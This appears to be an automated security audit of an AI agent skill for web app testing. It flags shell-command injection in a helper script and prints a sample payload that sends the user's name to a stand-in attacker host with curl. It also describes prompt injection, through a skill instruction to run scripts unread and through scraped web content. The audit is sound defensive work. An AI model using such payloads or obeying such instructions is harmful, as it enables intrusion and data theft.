webapp-testing
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The helper script
scripts/with_server.pyutilizessubprocess.Popenwithshell=Trueto execute commands passed as command-line arguments. - Evidence: Line 86 in
scripts/with_server.py:process = subprocess.Popen(server['cmd'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE). - Risk: This allows for arbitrary shell command injection if the agent or a user provides malicious input to the
--serverargument (e.g.,"npm run dev; curl http://attacker.com/$(whoami)"). - [PROMPT_INJECTION] (MEDIUM): The
SKILL.mddocumentation contains explicit instructions that discourage the agent from performing its usual safety step of reading source code before execution. - Evidence:
SKILL.md: "DO NOT read the source until you try running the script first... They exist to be called directly as black-box scripts rather than ingested into your context window." - Risk: While framed as context optimization, this instruction prevents the agent from auditing the logic of the
with_server.pyscript or any generated Playwright scripts, making it more susceptible to executing malicious payloads. - [INDIRECT_PROMPT_INJECTION] (LOW): The skill is designed to scrape and interact with web content, which is an untrusted ingestion point.
- Ingestion points:
page.content(),button.inner_text(), and browser console logs inexamples/element_discovery.pyandexamples/console_logging.py. - Boundary markers: None identified in the provided examples.
- Capability inventory: Arbitrary command execution via
scripts/with_server.pyand file writing to/mnt/user-data/. - Sanitization: None; the script directly prints and saves content retrieved from the browser.
- [DATA_EXPOSURE] (LOW): The skill captures browser logs and screenshots and writes them to persistent storage.
- Evidence:
examples/console_logging.pysaves data to/mnt/user-data/outputs/console.log. - Context: While this is standard for the tool's purpose, console logs often inadvertently contain sensitive session tokens or PII.
Recommendations
- AI detected serious security threats
Audit Metadata